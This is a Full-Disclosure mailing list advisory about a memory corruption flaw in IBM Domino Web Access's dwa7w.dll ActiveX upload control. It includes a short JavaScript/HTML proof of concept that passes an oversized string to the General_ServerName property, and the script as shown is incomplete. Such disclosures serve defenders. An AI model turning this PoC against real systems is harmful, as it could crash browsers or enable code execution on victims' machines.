[Full-disclosure] IBM Domino Web Access Upload Control dwa7w.dll Memory Corruption

The Domino Web Access Upload Module version seems to suffer from a memory corruption issue that may allow the execution of arbitrary code. By setting the General_ServerName property and calling the InstallBrowserHelperDll() function it MAY be possible to control the ECX register and thereby control the EIP. PoC as follows:

written by e.b.
<script language="JavaScript" DEFER>
function Check() {
var s = 'A';

while (s.length <= 12000) s = s + 'A';

obj.General_ServerName = s;


<body onload="JavaScript: return Check();">
<object id="obj" classid="clsid:E008A543-CEFB-4559-912F-C27C2B89F13B" />


Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Relevant Pages